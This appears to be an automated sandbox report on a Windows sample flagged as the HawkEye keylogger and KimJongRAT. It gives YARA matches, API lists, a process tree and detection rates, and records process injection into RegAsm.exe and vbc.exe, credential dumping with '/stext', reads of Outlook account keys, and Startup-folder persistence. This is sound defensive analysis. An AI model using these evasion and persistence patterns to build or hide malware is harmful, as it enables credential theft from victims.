Source: 5.2.RegAsm.exe.4d10000.1.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 19.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.2.RegAsm.exe.4d10000.1.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 1.2.RegAsm.exe.53b0000.1.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.unpack, type: UNPACKEDPE	Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 19.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 1.2.RegAsm.exe.53b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload

Source: 1.2.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.RegAsm.exe.400000.0.unpack, u206b????????????????????????????????????????.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.RegAsm.exe.400000.0.unpack, u206b????????????????????????????????????????.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 5.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs	Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 5.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs	Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 5.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs	Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 1.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.RegAsm.exe.400000.0.unpack, u200b????????????????????????????????????????.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs	Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 1.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs	Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 1.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs	Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 5.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.RegAsm.exe.400000.0.unpack, u200b????????????????????????????????????????.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@14/5@0/0

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 2_2_00417BE9 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

2_2_00417BE9

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 2_2_00418073 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

2_2_00418073

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 2_2_00413424 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,

2_2_00413424

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 2_2_004141E0 FindResourceW,SizeofResource,LoadResource,LockResource,

2_2_004141E0

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe

File created: C:\Users\user\AppData\Roaming\ezocxcvggg

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Mutant created: \Sessions\1\BaseNamedObjects\6cc8834c-22b2-4fc1-bfba-232b5346d9e8

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\ecfc61d0-e5dc-e5e1-276d-ec9f9689ba6d

Jump to behavior

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Command line argument: OPKKQWDOKD	0_2_00A31000
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Command line argument: BGBAQFXQZ	0_2_00A31000
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Command line argument: SOWQKFT	0_2_00A31000
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Command line argument: OPKKQWDOKD	4_2_00151000
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Command line argument: BGBAQFXQZ	4_2_00151000
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Command line argument: SOWQKFT	4_2_00151000

Source: b15023b1855da1cf5213b061dc626cc2.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: vbc.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: vbc.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp, vbc.exe, 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, RegAsm.exe, 00000005.00000002.606139905.0000000002DD2000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: vbc.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: vbc.exe	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: vbc.exe	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: vbc.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: b15023b1855da1cf5213b061dc626cc2.exe	Virustotal: Detection: 60%
Source: b15023b1855da1cf5213b061dc626cc2.exe	Metadefender: Detection: 48%
Source: b15023b1855da1cf5213b061dc626cc2.exe	ReversingLabs: Detection: 64%

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe

File read: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe 'C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp992B.tmp'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe 'C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpDC10.tmp'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp92CE.tmp'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpD611.tmp'
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp992B.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp92CE.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpDC10.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpD611.tmp'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: b15023b1855da1cf5213b061dc626cc2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: b15023b1855da1cf5213b061dc626cc2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: b15023b1855da1cf5213b061dc626cc2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: b15023b1855da1cf5213b061dc626cc2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: b15023b1855da1cf5213b061dc626cc2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: b15023b1855da1cf5213b061dc626cc2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: b15023b1855da1cf5213b061dc626cc2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: vbc.exe
Source:	Binary string: wntdll.pdbUGP source: b15023b1855da1cf5213b061dc626cc2.exe, 00000000.00000003.349652096.0000000032880000.00000004.00000001.sdmp, xjyxibeifbdmock.exe, 00000004.00000003.392999020.0000000032440000.00000004.00000001.sdmp
Source:	Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: RegAsm.exe, 00000001.00000002.608241206.00000000035AF000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.608017137.0000000002F0D000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000013.00000002.540468694.0000000000400000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: b15023b1855da1cf5213b061dc626cc2.exe, 00000000.00000003.349652096.0000000032880000.00000004.00000001.sdmp, xjyxibeifbdmock.exe, 00000004.00000003.392999020.0000000032440000.00000004.00000001.sdmp
Source:	Binary string: mscorrc.pdb source: RegAsm.exe, 00000001.00000002.610202715.0000000008510000.00000002.00000001.sdmp, RegAsm.exe, 00000005.00000002.609997040.0000000007E60000.00000002.00000001.sdmp

Source: b15023b1855da1cf5213b061dc626cc2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: b15023b1855da1cf5213b061dc626cc2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: b15023b1855da1cf5213b061dc626cc2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: b15023b1855da1cf5213b061dc626cc2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: b15023b1855da1cf5213b061dc626cc2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 2_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_004443B0

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A319A6 push ecx; ret	0_2_00A319B9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_014E912C push ecx; retf	1_2_014E9131
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A2F1C push ss; retf	1_2_055A2F1D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A2FA5 push ss; retf	1_2_055A2FA6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_00444975 push ecx; ret	2_2_00444985
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_00444B90 push eax; ret	2_2_00444BA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_00444B90 push eax; ret	2_2_00444BCC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_00448E74 push eax; ret	2_2_00448E81
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_0042CF44 push ebx; retf 0042h	2_2_0042CF49
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_001519A6 push ecx; ret	4_2_001519B9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_027F912C push ecx; retf	5_2_027F9131
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF9382 push esp; retf	5_2_04EF9421
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00444975 push ecx; ret	6_2_00444985
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00444B90 push eax; ret	6_2_00444BA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00444B90 push eax; ret	6_2_00444BCC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00448E74 push eax; ret	6_2_00448E81
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0042CF44 push ebx; retf 0042h	6_2_0042CF49
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 13_2_00412341 push ecx; ret	13_2_00412351
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 13_2_00412360 push eax; ret	13_2_00412374
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 13_2_00412360 push eax; ret	13_2_0041239C

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe

File created: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe

Jump to dropped file

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xjyxibeifbdmock.eu.url

Jump to behavior

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xjyxibeifbdmock.eu.url

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 2_2_00443A61 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00443A61

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
